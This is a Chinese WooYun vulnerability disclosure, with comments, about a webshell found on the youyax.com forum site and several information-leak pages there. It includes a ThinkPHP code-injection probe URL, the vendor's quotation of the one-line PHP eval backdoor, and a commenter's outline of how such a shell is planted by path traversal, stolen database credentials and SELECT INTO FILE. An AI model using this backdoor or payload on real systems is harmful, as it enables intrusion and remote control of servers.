当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-064185

漏洞标题:YouYaX捡到一枚shell

相关厂商:youyax.com

漏洞作者: 路人甲

提交时间:2014-06-09 17:20

修复时间:2014-06-09 22:11

公开时间:2014-06-09 22:11

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-09: 细节已通知厂商并且等待厂商处理中
2014-06-09: 厂商已经确认,细节仅向厂商公开
2014-06-09: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

YouYaX捡到一枚shell

详细说明:

YouYaX捡到一枚shell,附送几个信息泄漏吧
http://www.youyax.com/404/shell.php

99.png


还有没有其他的,还请自查
http://www.youyax.com/tp/index.php/module/aciton/param1/$%7B@phpinfo()%7D
http://www.youyax.com/plugin_list.php
http://www.youyax.com/pi.php 其他还请自查

99.png


99.png


99.png

漏洞证明:

YouYaX捡到一枚shell,附送几个信息泄漏吧
http://www.youyax.com/404/shell.php

99.png


还有没有其他的,还请自查
http://www.youyax.com/tp/index.php/module/aciton/param1/$%7B@phpinfo()%7D
http://www.youyax.com/plugin_list.php
http://www.youyax.com/pi.php 其他还请自查

99.png


99.png


99.png

修复方案:

扫到的,密码就跑了一下,未做任何操作。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-06-09 22:10

厂商回复:

不明觉厉!!!

最新状态:

2014-06-09:360检测安全了~可靠不?


漏洞评价:

评论

  1. 2014-06-09 20:40 | roker ( 普通白帽子 | Rank:357 漏洞数:108 )

    神奇的路人甲。我懂的

  2. 2014-06-09 20:49 | YouYaX(乌云厂商)

    @roker 神奇的路人甲,我不懂!!但感觉很厉害

  3. 2014-06-09 20:59 | 计算姬 ( 普通白帽子 | Rank:398 漏洞数:90 | 看我看我看我啊)

    @YouYaX 啊?这不就是捡到一个webshell的意思么

  4. 2014-06-09 21:15 | YouYaX(乌云厂商)

    @计算姬 路人甲连FTP都登陆了,难道凭着一个phpinfo()的信息就能搞定一切了?

  5. 2014-06-09 21:27 | 木马人 ( 普通白帽子 | Rank:113 漏洞数:25 | 白,灰,黑)

    @YouYaX 应该不是phpinfo(),捡到的webshell上去看看观望的吧。。。看样子shell功能应该挺强大

  6. 2014-06-09 21:55 | roker ( 普通白帽子 | Rank:357 漏洞数:108 )

    @YouYaX shell 指的不是 phpinfo。。你看见好多漏洞说能phpinfo(),只是证明能getshell。。

  7. 2014-06-09 22:04 | YouYaX(乌云厂商)

    @roker 有一个文件里我有url地址栏../../../遍历漏洞,我现在360检测一下,最好奇的就是获取FTP了,不过这是黑客吃饭的看家本事,肯定不说的,囧,安全得分:100分,处理了以后,恭喜您,本次共检测了4个页面,没有发现任何问题,特授予您五星神站称号!

  8. 2014-06-10 12:13 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    这个shell是来的,应该不是捡到的吧,扫描器也跑不出这个shell吧,另有内幕

  9. 2014-06-10 12:35 | YouYaX(乌云厂商)

    @U神 知道是什么内幕吗?

  10. 2014-06-10 12:37 | YouYaX(乌云厂商)

    shell.php不知道是怎么传上去的,打开里面只有一句话,<?php eval($_POST['cmd']);?>,能看出什么端倪不?

  11. 2014-06-10 13:00 | 计算姬 ( 普通白帽子 | Rank:398 漏洞数:90 | 看我看我看我啊)

    @YouYaX 看时间,应该是以前留下的吧。如果以前有../../遍历漏洞,完全可以下载config文件,找到数据库密码,连接。再用用信息泄漏有路径,直接select into file 就可以写一个shell了。这是我留的你敢信。

  12. 2014-06-10 13:03 | 计算姬 ( 普通白帽子 | Rank:398 漏洞数:90 | 看我看我看我啊)

    @U神 看U神如何重新getshell一遍,告诉我们端倪。话说,昨天U神的那发预警,啥时候才能看到哦。

  13. 2014-06-10 13:07 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @计算姬 我插,没啥技术性,很久之前有人提过,没多少人在意,三月我在库带谈起过这类缺陷,于是乌云上就有人用这个刷了几炮,后来我想了下,刚催汇总一下

  14. 2014-06-10 13:09 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @YouYaX 这是一句话木马啊。这么屌?难道是之前发漏洞的人测试时候留下的shell?看看时间,看看日志,你就明白了

  15. 2014-06-10 13:14 | 计算姬 ( 普通白帽子 | Rank:398 漏洞数:90 | 看我看我看我啊)

    @U神 表示你rank太高,向普通白帽子公开了也看不到。

  16. 2014-06-10 13:14 | 计算姬 ( 普通白帽子 | Rank:398 漏洞数:90 | 看我看我看我啊)

    @YouYaX 删了就好,还追求啥。360都说你牛逼了,360是最牛逼的。

  17. 2014-06-10 13:55 | YouYaX(乌云厂商)

    查了一下日志,晕,210.22.108.117试图侵入数据库,不知成功没有,囧